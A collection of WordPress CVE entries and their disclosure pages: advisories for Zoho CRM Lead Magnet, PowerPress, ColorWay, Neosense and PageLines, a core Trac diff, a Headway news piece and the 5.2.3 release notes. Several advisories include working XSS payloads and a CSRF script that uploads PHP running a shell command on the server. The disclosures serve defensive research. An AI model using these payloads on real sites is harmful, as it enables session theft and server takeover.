The Zoho CRM Lead Magnet plugin 1.6.9.1 for WordPress allows XSS via module, EditShortcode, or LayoutName.

**Details**

ZOHO CRM Lead Magnet version 1.6.9.1  
Bug Name: Reflected Cross Site Scripting (XSS) in WordPress Plugin  
Product: ZOHO CRM Lead Magnet version 1.6.9.1  
Version: 1.6.9.1  
Last Updated: 14-10-2019  
Homepage: http://localhost/wordpress/  
Severity: High  
Status: Fixed  
Exploitation Requires Authentication?: yes  
Vulnerable URL: http://localhost/wordpress/wp-admin/admin.php?page=create-leadform-builder&\_\_module=ManageShortcodes&\_\_action=zcfCrmManageFieldsLists&onAction=onCreate&crmtype=crmformswpbuilder&module=Leads&EditShortcode=58H3N&LayoutName=Standard&formName=Unititled  
Vulnerable Variable: **Module & EditShortcode & LayoutName**

**Description:**

A cross site scripting (XSS) attack can cause arbitrary code (java script) to run in a user’s browser while the browser is connected to a trusted web site. The application targets your application’s users and not the application itself, but it uses your application as the vehicle for the attack. XSS payload is executing when the user loads an create lead form page created in **Zoho CRM Lead Magnet Version 1.6.9.1**

**Proof of concept: (POC)**

**Issue 1:**

By exploiting a Cross-site scripting vulnerability an attacker easily gain access to user’s session by stealing cookies and also exploit the user browser.

1.  Login to the application
    
2.  Install Zoho CRM Lead Magnet Plugin
    

**Figure 01:** Zoho CRM Lead Magnet

3.  Configure the **client id** and **secret key**  
    

**Figure 02:** client key and secret id are filled in Authenticating Zoho CRM Plugin

4.  Click on **Create New Form** button and fill the values and click on **Next** button

**Figure 03:** new form in Zoho CRM Plugin

5.  Add the payload <img src=x onerror=alert(document.cookie)> to the vulnerable parameters by intercepting the request in a proxy tool.

**Figure 04:** Request with XSS payload sent to the server

  
**Figure 05:** Request and response captured in the proxy

6.  Injected XSS payload is successfully executed when the user visits or reloads the page  
    

**Figure 06:** The JavaScript is successfully executed in the victim browser context

**Figure 07:** The WordPress application running on version 5.2.3

**Figure 08:** The WordPress **Zoho CRM Lead Magnet plugin Version: 1.6.9.1**

**Figure 09:** The default cross-site scripting mitigation setting in **wp.config** file to prevent cross site scripting attacks.

**Reproducing Steps**

1.  Logon into WordPress application in localhost
2.  Access the vulnerable GET Request URL with XSS payload inserted into the vulnerable variable.
3.  XSS will get executed in the user machine once the user clicks on the given vulnerable link.

**Timeline**

2019-10-13 – Discovered in WordPress( Zoho CRM Lead Magnet Plugin ) Product  
2019-10-14 – Reported to plugins@wordpress.org  
2019-10-15 – Received instant response from WordPress plugin team.  
2019-10-15 – Issue acknowledged and fixed immediately.  
2019-10-16 – Came up with a write up here.

**Discovered by:**  
Saran Baskar from Cyber Security Works Research Lab

CVE-2019-19306: ZOHO CRM Lead Magnet version 1.6.9.1 · Issue #16 · cybersecurityworks/Disclosed

A Denial Of Service vulnerability exists in the safe-svg (aka Safe SVG) plugin through 1.9.4 for WordPress, related to unlimited recursion for a '<use ... xlink:href="#identifier">' substring.

CVE-2019-18854: Changeset 2185438 – WordPress Plugin Repository

WordPress before 5.2.4 has a Server Side Request Forgery (SSRF) vulnerability because Windows paths are mishandled during certain validation of relative URLs.

CVE-2019-17670

WordPress before 5.2.4 does not properly consider type confusion during validation of the referer in the admin pages, possibly leading to CSRF.

Timestamp:

10/14/2019 03:38:14 PM (3 years ago)

whyisjake

Message:

Administration: Ensure that admin referer nonce is valid.  

Coding standards, ensure that nonce is valid with identical, rather then equal operator.  

Props vortfu, xknown, whyisjake.  

Location:

trunk

Files:

  

*   src/wp-includes/pluggable.php (2 diffs)
*   tests/phpunit/tests/auth.php (2 diffs)

**Legend:**

Unmodified

Added

Removed

*   **trunk/src/wp-includes/pluggable.php**
    
    r46472
    
    r46477
    
     
    
    1107
    
    1107
    
         \*/
    
    1108
    
    1108
    
        function check\_admin\_referer( $action = -1, $query\_arg = '\_wpnonce' ) {
    
    1109
    
     
    
            if ( -1 == $action ) {
    
     
    
    1109
    
            if ( -1 ==\= $action ) {
    
    1110
    
    1110
    
                \_doing\_it\_wrong( \_\_FUNCTION\_\_, \_\_( 'You should specify a nonce action to be verified by using the first parameter.' ), '3.2.0' );
    
    1111
    
    1111
    
            }
    
    …
    
    …
    
     
    
    1126
    
    1126
    
            do\_action( 'check\_admin\_referer', $action, $result );
    
    1127
    
    1127
    
    1128
    
     
    
            if ( ! $result && ! ( -1 == $action && strpos( $referer, $adminurl ) === 0 ) ) {
    
     
    
    1128
    
            if ( ! $result && ! ( -1 ==\= $action && strpos( $referer, $adminurl ) === 0 ) ) {
    
    1129
    
    1129
    
                wp\_nonce\_ays( $action );
    
    1130
    
    1130
    
                die();
    
*   **trunk/tests/phpunit/tests/auth.php**
    
    r45717
    
    r46477
    
     
    
    25
    
    25
    
            self::$user\_id = self::$\_user->ID;
    
    26
    
    26
    
    27
    
     
    
            require\_once( ABSPATH . WPINC . '/class-phpass.php' );
    
     
    
    27
    
            require\_once ABSPATH . WPINC . '/class-phpass.php';
    
    28
    
    28
    
            self::$wp\_hasher = new PasswordHash( 8, true );
    
    29
    
    29
    
        }
    
    …
    
    …
    
     
    
    166
    
    166
    
        }
    
    167
    
    167
    
     
    
    168
    
        public function test\_check\_admin\_referer\_with\_default\_action\_as\_string\_not\_doing\_it\_wrong() {
    
     
    
    169
    
            $this->setExpectedIncorrectUsage( 'check\_admin\_referer' );
    
     
    
    170
    
            // A valid nonce needs to be set so the check doesn't die()
    
     
    
    171
    
            $\_REQUEST\['\_wpnonce'\] = wp\_create\_nonce( '-1' );
    
     
    
    172
    
            $result               = check\_admin\_referer( '-1' );
    
     
    
    173
    
            $this->assertSame( 1, $result );
    
     
    
    174
    
     
    
    175
    
            unset( $\_REQUEST\['\_wpnonce'\] );
    
     
    
    176
    
        }
    
     
    
    177
    
    168
    
    178
    
        /\*\*
    
    169
    
    179
    
         \* @ticket 36361
    

**Note:** See TracChangeset for help on using the changeset viewer.

CVE-2019-17675: Changeset 46477 – WordPress Trac

The Blubrry PowerPress Podcasting plugin 6.0.4 for WordPress has XSS via the tab parameter.

**Details**

Word Press Product Bugs Report  
Bug Name Cross Site Scripting (XSS)  
Software: Blubrry PowerPress Podcasting plugin  
Version: 6.0.4  
Last Updated: 27-08-2015  
Homepage: https://wordpress.org/plugins/powerpress/developers/  
Compatible Up to Wordpress 4.3.0 Version (Requires: 3.6 or higher)  
Severity High  
Description: Cross Site Scripting (XSS) vulnerability in WordPress plugin NextGen Gallery

**Proof of concept: (POC)**

Visit the following page on a site with this plugin installed. http://yourwordpresssite.com/wordpress/wp-admin/admin.php?page=powerpress/powerpressadmin\_basic.php and modify the value of tab variable with "></script><script>alert(document.cookie);</script> payload and send the request to the server.

Now, the added XSS payload will be echoed back from the server without validating the input. It also affects wp-config.php file, $table\_prefix and corrupts the database connectivity.

**Note:** XSS payload has been tried with the application once after implementing Unfiltered Html Settings as defined to wp-config.php file.

_**define( 'DISALLOW\_UNFILTERED\_HTML', true );**_

**Issue 1:**

The Post Request **tab** variable in the URL http://localhost/wordpress/wp-admin/admin.php?page=powerpress/powerpressadmin\_basic.php is vulnerable to Cross Site Scripting (XSS)

**Figure 1:** Invalid HTTP script Request sent to the server through the vulnerable **tab** variable in the URL http://yourwordpresssite.com/wordpress/wp-admin/admin.php?page=powerpress/powerpressadmin\_basic.php and its echoed back in the HTTP Response without validation.

**Reproducing Steps**

1.  Logon into any wordpress application (localhost or public host)
2.  Modifying the value of tab variable in Blubrry PowerPress Version 6.0.4
3.  Fill all the variables with "></script><script>alert(document.cookie);</script> payload and send the request to the server.
4.  Now, the added XSS payload will be echoed back from the server without validating the input even after wp-config.php file has been configured with XSS filter settings.

**Timeline**

2015-09-04 – Discovered in Blubrry PowerPress Podcasting plugin 6.0.4 version.  
2015-09-04 – Reported to plugins@wordpress.org  
2015-09-07 – Vendor Responded, "Thank you for reporting this plugin. We're looking into it right now."  
2015-09-09 – Fixed in Blubrry PowerPress Podcasting plugin 6.0.5 version.

**Discovered by:**  
Sathish from Cyber Security Works Pvt Ltd

CVE-2015-9410: XSS Vulnerability in Blubrry PowerPress Podcasting plugin Version 6.0.4 · Issue #7 · cybersecurityworks/Disclosed

The colorway theme before 3.4.2 for WordPress has XSS via the contactName parameter.

Yorick Koster, July 2016

**Cross-Site Scripting vulnerability in ColorWay WordPress Theme****Abstract**

Multiple Cross-Site Scripting vulnerabilities were found in the ColorWay WordPress Theme. These issues allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker has to lure/force a victim into opening a malicious website.

**Contact**

For feedback or questions about this advisory mail us at sumofpwn at securify.nl

**The Summer of Pwnage**

This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.

**OVE ID**

OVE-20160712-0024

**Tested versions**

These issues were successfully tested on ColorWay WordPress Theme version 3.4.1.

**Fix**

This issue is resolved in ColorWay WordPress Theme version 3.4.2.

**Introduction**

Colorway is simple, elegant, responsive WordPress Theme built by InkThemes.com. Multiple Cross-Site Scripting vulnerabilities were found in the ColorWay WordPress Theme. These issues allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker has to lure/force a victim into opening a malicious website.

**Details**

These issues exists due to the lack of output encoding of user input. An example can be seen in the file _contact.php_. Several POST parameters are using in the output without applying proper encoding.

<form action="<?php the\_permalink(); ?>" id="contactForm" method="post">  
   <ul class="contactform">  
      <li>  
         <label for="contactName"><?php \_e('Name:', 'colorway'); ?></label>  
         <input type="text" name="contactName" id="contactName" value="<?php if (isset($\_POST\['contactName'\])) **echo $\_POST\['contactName'\];** ?>" class="required requiredField" />  
         <?php if ($nameError != '') { ?>  
            <span class="error"> <?php echo $nameError; ?> </span>  
         <?php } ?>  
      </li>  
      <li>  
         <label for="email"><?php \_e('Email', 'colorway'); ?></label>  
         <input type="text" name="email" id="email" value="<?php if (isset($\_POST\['email'\])) **echo $\_POST\['email'\];** ?>" class="required requiredField email" />  
         <?php if ($emailError != '') { ?>  
            <span class="error"> <?php echo $emailError; ?> </span>  
         <?php } ?>  
      </li>  
      <li>  
         <label for="commentsText"><?php \_e('Message:', 'colorway'); ?></label>  
         <textarea name="comments" id="commentsText" rows="20" cols="30" class="required requiredField"><?php  
            if (isset($\_POST\['comments'\])) {  
               if (function\_exists('stripslashes')) {  
                  **echo stripslashes($\_POST\['comments'\]);**  
               } else {  
                  **echo $\_POST\['comments'\];**  
               }  
            }  
         ?>  
         </textarea>  
         <?php if ($commentError != '') { ?>  
            <span class="error"> <?php echo $commentError; ?> </span>  
         <?php } ?>  
      </li>  
      <li>  
         <input type="submit" value="<?php \_e('Send Email', 'colorway'); ?>"/>  
      </li>  
   </ul>  
   <input type="hidden" name="submitted" id="submitted" value="true" />  
</form>

**Proof of concept**

<html>  
   <body>  
      <form action="http://<target>/contact/" method="POST">  
         <input type="hidden" name="contactName" value="&quot;><script>alert(document.cookie);</script>" />  
         <input type="hidden" name="email" value="" />  
         <input type="hidden" name="comments" value="                                                " />  
         <input type="hidden" name="submitted" value="true" />  
         <input type="submit" value="Submit request" />  
      </form>  
   </body>  
</html>

CVE-2016-10961: Summer of Pwnage! July 1-29, Amsterdam.

The Neosense theme before 1.8 for WordPress has qquploader unrestricted file upload.

**Vulnerability**

Neosense is a WordPress theme by dynamicpress.

Neosense theme version 1.7 contains an unrestricted file upload vulnerability.

Version 1.7 (and possibly earlier) includes in its theme directory a copy of the "qquploader" ajax file uploader, which does not verify user authorization. Using this uploader, an attacker can upload any file to the site. The uploaded file is placed in the wp-content/uploads/YYYY/mm directory, which is normally writable.

The vulnerability can be used to achieve remote code execution by uploading a PHP script with extension .php or .phtml.

**Fix**

The vulnerability was fixed in Neosense theme 1.8 by switching to WordPress core functions for file uploads.

**Timeline**

*   12 Aug: Vulnerability submitted to dynamicpress
*   16 Aug: Response by dynamicpress
*   29 Aug: Neosense theme 1.8 released by dynamicpress
*   19 Sep: Vulnerability published

**Credits**

The vulnerability was found by Walter Hop, Slik BV, The Netherlands.

CVE-2016-10954: Unrestricted Upload/RCE in Neosense theme 1.7

The Headway theme before 3.8.9 for WordPress has XSS via the license key field.

If you noticed an update for Headway, it’s not your mind playing tricks. Late last week, Headway Themes released version 3.8.9 to patch a potential security vulnerability involving the license key field. The vulnerability was discovered and reported to Sucuri by Gary Bairéad, a former Headway Themes employee.

At the time of writing, the company has not publicly announced the availability of 3.8.9 to customers. The update comes more than a month since founders Grant and Clay Griffiths issued an apology for the lack of customer support and communication.

**Lack of Communication and Support Continues**

Since the apology was published, the company’s blog and social media accounts have remained silent. Bairéad continues to use his site to update the public on the status of Headway Themes. In his most recent post, Bairéad published a number of screenshots that show the company is still not providing the level of support advertised on its site.

**One Month Progress Report**

I reached out to Grant and Clay Griffiths to find out what progress they’ve made on providing “a first level of support service” as mentioned in the apology, what steps they’ve taken to rebuild the business, and if they have any comments on Bairéad’s article.

“Support is being provided and updates have been and will continue to be pushed,” Grant said. “We are also in contact with Influx to further improve our support,” Clay said.

Influx provides customer support for companies, including those in the WordPress ecosystem such as Advanced Custom Fields. Influx has elastic pricing allowing companies to pay for the amount of support they need. Prices start at $199 per month and increase as the number of responses increases.

While the Griffiths did not recognize unpaid staff in their apology, former employees have since received partial payments of the money they are owed.

**Community Is Optimistic About Headway Fork**

While the future of Headway Themes and its product remain in limbo, many in the community are optimistically supporting a fork called Blox Builder. Blox is a fork of Headway 3.8.8 created by Maarten Schraven that is 100% GPL licensed.

**Headway is Not 100% GPL**

According to Headway Theme’s terms of service, “All WordPress themes produced by Headway Themes, LLC are released under the GPL version 2.0 license.”

A key difference between Blox and Headway is that Blox doesn’t use Redactor.js, a WYSISWYG editor. The script is $199 and its license agreement makes it incompatible with the GPL.

Upfront, a product created by WPMU Dev launched with Redactor.js. In the launch post, James Farmer, founder and CEO of WPMU Dev, confirmed that everything in Upfront is GPL except for Redactor, “Everything in Upfront is currently 100% GPL, with that exception, as they won’t let us… we’ve asked,” he said.

At best, Headway is split-licensed but there is no verbiage on the site that informs customers. Considering Clay is a co-owner of a WordPress business that sells a product that is not 100% GPL, should he be able to sponsor WordCamps advertising Pressmatic? According to the WordCamp organizer handbook, no.

If users and customers want to support a 100% GPL product that’s actively developed, check out the community-driven fork. Blox recently came to a consensus on pricing and are offering a 40% discount with three months of extra support and updates for former Headway customers.

CVE-2016-10953: Headway 3.8.9 Patches Potential XSS Vulnerability

The PageLines theme 1.1.4 for WordPress has wp-admin/admin-post.php?page=pagelines CSRF.

Platform 4 by PageLines is a WordPress theme. During a bug bounty investigation, a CSRF-RCE vulnerability was found in the administrative functions of the theme. A settings upload function doesn’t check for a CSRF token. Contents of the uploaded settings file are evaluated as PHP so a successful attack leads to direct server-side code execution.

The exploit requires that an administrator of a vulnerable site views attacker-supplied HTML code while being logged on the system.

**Details**

The file _includes/library.options.php_ contains the following problematic code:

        if ( isset($\_POST\['settings\_upload'\]) && $\_POST\['settings\_upload'\] == 'settings') {
		/\*
		... some (insufficient) sanity checks first ...
		\*/
                        ob\_start();
                        include($\_FILES\['file'\]\['tmp\_name'\]);
		/\*
		...
		\*/

This is a fairly typical CSRF vulnerability with two exceptions. Firstly, the impact is probably more serious than usual because the attacker-supplied code is directly evaluated on the server by the _include()_ statement above. Secondly, the exploit requires a file upload POST request which prevents the use of a normal HTML form element.

A malicious script can spoof an arbitrary file upload form submission in this way:

<script>
var phpsrc='<?php system("id > /tmp/exploit.txt");exit(0); ?>';
var x=new XMLHttpRequest();
x.open('POST','https://target.site/wp-admin/admin-post.php?page=pagelines');
x.withCredentials=true;
var fd=new FormData();
fd.append("settings\_upload","settings");
fd.append("file",new Blob(\[phpsrc\]),"Settings");
x.send(fd);
</script>

If an administrator views a page containing this script, a settings upload request is fired. In this example the command **id > /tmp/exploit.txt** is immediately executed on the server.

**Vendor response**

PageLines was notified on October 20, 2016. According to the vendor, Platform 1.4.4 is unsupported and won’t be fixed. PageLines advices users of the theme to upgrade to the latest product Platform Pro.

The bug bounty program (unrelated to PageLines) did not issue a reward, not considering it a “real world threat” that an administrator could view a malicious web page.

**Credits**

The vulnerability was discovered and researched by Jouko Pynnönen of Klikki Oy, Finland.

The bug is related to this one reported by Sucuri in 2015. The vulnerability described by Sucuri was exploitable without authentication, making it more severe. The bug fix in 2015 stopped direct unauthenticated attacks but didn’t prevent reflected, CSRF attacks described here.

CVE-2016-10945: PageLines Platform 1.1.4 CSRF vulnerability | Klikki

WordPress before 5.2.3 allows XSS in post previews by authenticated users.

WordPress 5.2.3 is now available!

This security and maintenance release features 29 fixes and enhancements. Plus, it adds a number of security fixes—see the list below.

These bugs affect WordPress versions 5.2.2 and earlier; version 5.2.3 fixes them, so you’ll want to upgrade.

If you haven’t yet updated to 5.2, there are also updated versions of 5.1 and earlier that fix the bugs for you.

**Security Updates**

*   Props to Simon Scannell of RIPS Technologies for finding and disclosing two issues. The first, a cross-site scripting (XSS) vulnerability found in post previews by contributors. The second was a cross-site scripting vulnerability in stored comments. 
*   Props to Tim Coen for disclosing an issue where validation and sanitization of a URL could lead to an open redirect. 
*   Props to Anshul Jain for disclosing reflected cross-site scripting during media uploads.
*   Props to Zhouyuan Yang of Fortinet’s FortiGuard Labs who disclosed a vulnerability for cross-site scripting (XSS) in shortcode previews.
*   Props to Ian Dunn of the Core Security Team for finding and disclosing a case where reflected cross-site scripting could be found in the dashboard.
*   Props to Soroush Dalili (@irsdl) from NCC Group for disclosing an issue with URL sanitization that can lead to cross-site scripting (XSS) attacks.
*   In addition to the above changes, we are also updating jQuery on older versions of WordPress. This change was added in 5.2.1 and is now being brought to older versions. 

You can browse the full list of changes on Trac.

For more info, browse the full list of changes on Trac or check out the Version 5.2.3 documentation page.

WordPress 5.2.3 is a short-cycle maintenance release. The next major release will be version 5.3.

You can download WordPress 5.2.3 from the button at the top of this page, or visit your **Dashboard → Updates** and click **Update Now**.

If you have sites that support automatic background updates, they’ve already started the update process.

**Thanks and props!**

This release brings together contributions from more than 62 other people. Thank you to everyone who made this release possible!

Adam Silverstein, Alex Concha, Alex Goller, Andrea Fercia, Andrew Duthie, Andrew Ozz, Andy Fragen, Ashish Shukla, Aslam Shekh, backermann1978, Catalin Dogaru, Chetan Prajapati, Chris Aprea, Christoph Herr, dan@micamedia.com, Daniel Llewellyn, donmhico, Ella van Durpe, epiqueras, Fencer04, flaviozavan, Garrett Hyder, Gary Pendergast, gqevu6bsiz, Hardik Thakkar, Ian Belanger, Ian Dunn, Jake Spurlock, Jb Audras, Jeffrey Paul, jikamens, John Blackbourn, Jonathan Desrosiers, Jorge Costa, karlgroves, Kjell Reigstad, laurelfulford, Maje Media LLC, Martin Spatovaliyski, Mary Baum, Monika Rao, Mukesh Panchal, nayana123, Ned Zimmerman, Nick Daugherty, Nilambar Sharma, nmenescardi, Paul Vincent Beigang, Pedro Mendonça, Peter Wilson, Sergey Biryukov, Sergey Predvoditelev, Sharaz Shahid, Stanimir Stoyanov, Stefano Minoia, Tammie Lister, tellthemachines, tmatsuur, Vaishali Panchal, vortfu, Will West, and yarnboy.

Tag

#wordpress